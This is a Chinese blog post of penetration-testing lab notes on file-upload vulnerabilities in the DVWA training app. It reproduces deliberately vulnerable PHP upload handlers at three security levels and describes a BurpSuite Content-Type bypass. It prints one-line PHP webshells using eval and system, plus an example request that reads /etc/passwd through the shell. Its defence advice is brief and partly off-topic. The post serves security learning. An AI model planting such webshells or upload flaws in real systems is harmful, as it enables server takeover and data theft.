渗透测试笔记(一)——文件上传漏洞渗透及防御

最新推荐文章于 2024-08-02 16:59:58 发布
最新推荐文章于 2024-08-02 16:59:58 发布
阅读量1k 收藏 3
点赞数
文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67044952/article/details/125155692
版权

实验环境

测试渗透机:Kali-Linux-2021.4a-vmware-amd64

目标靶机:OWASP Broken Web Application VM 1.2

实验原理

 

如果恶意文件如PHP、ASP等执行文件绕过Web应用并顺利执行,则相当于黑客拿到了Webshell。

一旦黑客拿到Webshell,则可以拿到Web应用数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网。

SQL注入攻击对象是数据库服务,文件上传漏洞主要攻击Web服务,实际渗透两种相结合,达到对目标的深度控制。

攻击过程

实验一

下面是一个文件上传界面,可以上传图像,但是安全机制低,用户可以上传任意文件。

 

页面源码:

 <?php
     if (isset($_POST['Upload'])) {
 ​
             $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
             $target_path = $target_path . basename( $_FILES['uploaded']['name']);
 ​
             if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                 
                 echo '<pre>';
                 echo 'Your image was not uploaded.';
                 echo '</pre>';
                 
               } else {
             
                 echo '<pre>';
                 echo $target_path . ' succesfully uploaded!';
                 echo '</pre>';
                 
             }
 ​
         }
 ?>

实验二

安全等级:中

页面源码:

 <?php
     if (isset($_POST['Upload'])) {
 ​
             $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
             $target_path = $target_path . basename($_FILES['uploaded']['name']);
             $uploaded_name = $_FILES['uploaded']['name'];
             $uploaded_type = $_FILES['uploaded']['type'];
             $uploaded_size = $_FILES['uploaded']['size'];
 ​
             if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
 ​
 ​
                 if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                 
                     echo '<pre>';
                     echo 'Your image was not uploaded.';
                     echo '</pre>';
                     
                   } else {
                 
                     echo '<pre>';
                     echo $target_path . ' succesfully uploaded!';
                     echo '</pre>';
                     
                     }
             }
             else{
                 echo '<pre>Your image was not uploaded.</pre>';
             }
         }
 ?>

实验三

安全级别:高

页面源码:

 <?php
 if (isset($_POST['Upload'])) {
 ​
             $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
             $target_path = $target_path . basename($_FILES['uploaded']['name']);
             $uploaded_name = $_FILES['uploaded']['name'];
             $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
             $uploaded_size = $_FILES['uploaded']['size'];
 ​
             if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
 ​
 ​
                 if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                     
                     echo '<pre>';
                     echo 'Your image was not uploaded.';
                     echo '</pre>';
                 
                   } else {
                 
                     echo '<pre>';
                     echo $target_path . ' succesfully uploaded!';
                     echo '</pre>';
                     
                     }
             }
             
             else{
                 
                 echo '<pre>';
                 echo 'Your image was not uploaded.';
                 echo '</pre>';
 ​
             }
         }
 ​
 ?>

实施攻击

低安全级别

上传一句话木马:

 <?php 
 @eval($_POST["chopper"]);
  ?>

打开中国菜刀,攻击成功

中安全级别

PHP源码中限定上传文件MIME-type为"image/jpeg",使用BurpSuite

 

将拦截到的报文中Conten-type字段改为image/jpeg,再转发,文件上传成功

高安全级别

限制文件扩展名,修改报文再转发可以看到目录结构,但是很多文件无法操作

Webshell

小马:一句话木马也称为小马,即整个shell代码量只有一行,一般是系统执行函数

大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵检测系统检测到

 shell.php # eval 使用php函数,例如phpinfo()
 <?php eval($_REQUEST['cmd']); ?>
 ​
 http://192.168.1.1/dvwa/uploads/shell.php?cmd=phpinfo()
 shell.php # system 使用Linux系统命令,例如ls cp rm
 <?php system($_REQUEST['cmd']); ?>
 ​
 http://192.168.1.1/dvwa/uploads/shell.php?cmd=cat /etc/passwd

中国菜刀

 <?php @eval($_POST['chopper']); ?>

漏洞防范

设置文件类型限制

防范DDoS攻击:防火墙

防范CC攻击:WAF

Replyme
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB渗透学习笔记8——csrf和ssrf漏洞
林林木林林L的博客
08-09 1476
CSRF漏洞 CSRF漏洞介绍 跨站点请求伪造(Cross Site Request Forgery)是一种经典的网络攻击方式,它一直是OWASP TOP 10之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来和跨站脚本攻击很相似,但它与跨站脚本攻击非常不同,并且攻击方式几乎完全不一样。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。跨站脚本攻击利用站点内的信任用户,而CSRF则
个人笔记-渗透测试-文件上传漏洞
weixin_48162696的博客
05-26 934
文件上传漏洞原理,绕过方式,远程连接获取shell,漏洞防御
Web渗透文件上传漏洞
WolvenSec的博客
06-23 699
这段代码的主要功能是通过检查文件扩展名,确保用户上传文件符合预期(["jpg","png","gif"];)的格式要求。如果文件的扩展名不在允许的列表中,用户将看到一个警告消息,并且页面会重新加载。
网络安全学习笔记——文件上传漏洞(PTE-WEB
just do it
05-23 207
文件上传漏洞网页的功能有关,如果它允许上传东西且检验不严格的话就会发生文件上传漏洞,此功能是开发者设计的实际生活中,文件上传的场景很多,微信的头像的上传,学校里信息的上报等,都可能会存在文件上传漏洞漏洞的危害很大,有可能会威胁到操作系统和服务器的权限(shell),getshell意为获取了权限,上传功能键如果被利用,其危害会很大。
个人笔记-渗透测试-逻辑漏洞的分类与使用情景
weixin_48162696的博客
06-03 1032
逻辑漏洞的举例,相关检查,及防御措施
个人笔记-渗透测试-文件包含漏洞
weixin_48162696的博客
05-27 612
什么是文件包含漏洞文件包含漏洞的利用,防御措施。
渗透测试笔记(三)——SQL注入攻击及防御(1)
m0_67044952的博客
06-06 830
程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。1、对于Web应用程序而言,用户核心数据存储在数据库中,例如MySQL、SQL Server、Oracle等;2、通过SQL注入攻击,可以获取、修改、删除数据库信息,并且通过提权来控制Web服务器等其他操作;3、SQL注入即攻击者通过构造特殊的SQL语句,入侵目标系统,致使后台数据库泄露数据的过程;4、因为SQL注入漏洞造成的严重危害性,所以常年稳居OWASP TOP10榜首。危害:1、拖库导致用户数据泄露;2、危害Web等应用的安全;3、失去操作系统
Cracer渗透视频课程学习笔记——漏洞分析
尘埃飞舞
08-14 2140
一、常用漏洞分析工具使用 NMAP AWVS AppScan Burpsuite Netsparker JsKy safe3wvs 椰树 M7Lrv 1:NMAP常用功能(端口扫描之王) 主机探测 端口扫描 服务版本扫描 主机系统指纹识别 密码破解 漏洞探测 创建扫描脚本 端口扫描之王------------NMAP Nmaps是一款非常强大的使用工具,可用于: ...
渗透测试笔记——您的安全探索之旅
gitblog_00051的博客
06-04 334
渗透测试笔记——您的安全探索之旅 项目地址:https://gitcode.com/hexrom/PenetrationTesting-Playbook 项目介绍 Penetration Testing Notes 是一个汇集了网络安全领域的丰富知识和实战技巧的开源项目。这个项目按照不同的安全领域划分为多个部分,旨在帮助初级到高级的安全研究人员提升技能,进行有效的渗透测试和系统审计。无论您是热衷...
Kali Linux渗透测试——无线渗透
Captain_RB的博客
03-17 3678
Kali Linux渗透测试学习笔记——无线渗透 笔记内容参考安全牛Kali Linux渗透测试视频教程,仅供个人学习记录使用。 文章目录Kali Linux渗透测试学习笔记——无线渗透一、基本概念 一、基本概念 无线通信领域庞大复杂,这里只介绍 图1 常见无线通信技术分类 ...
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
渗透测试学习笔记之案例一.pdf
04-06
### 渗透测试学习笔记之案例一 #### 1. 前言 在渗透测试领域,持续的技术积累和实战经验分享对于个人成长至关重要。本文档记录了一个具体的渗透测试案例,旨在通过实战演练来加深对渗透测试技术的理解,并为后续的...
Python之渗透测试笔记(五) ——Requests模块
12-21
Requests模块是Python编程中用于发送HTTP请求的重要第三方库,它为开发者提供了简洁、直观的接口,使得处理HTTP请求...无论是在Web开发、自动化测试还是渗透测试中,Requests都能极大地简化网络数据的获取和处理过程。
python之渗透测试笔记(一)
01-20
python之渗透测试(一)—— Socket模块Socket模块须知简介基本用法使用Socket编写一个简单的服务端和客户端 Socket模块须知 在TCP/IP协议族中,Socket并不是协议,而是一个编程接口。 TCP/IP是传输层协议,主要解决...
渗透测试笔记.rar
02-25
这份名为"渗透测试笔记.rar"的压缩包文件包含了两份文档,分别是"渗透测试-实验拓扑环境 2020年1月22日.pdf"和"渗透测试 2020年1月21日.pdf",它们似乎源自《Metasploit渗透测试魔鬼训练营》一书的学习笔记,旨在...
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 441
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
最新发布
2301_76813281的博客
08-02 403
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 156
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
渗透测试实战:案例一—发现与修复SMB服务漏洞
在"渗透测试学习笔记之案例一.pdf"中,作者分享了其学习渗透测试过程中的一个实际案例。首先,他强调由于工作繁忙而暂停了博客更新,但为了保持技能的熟练度,他决定开始记录与渗透测试相关的学习笔记。这个系列将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值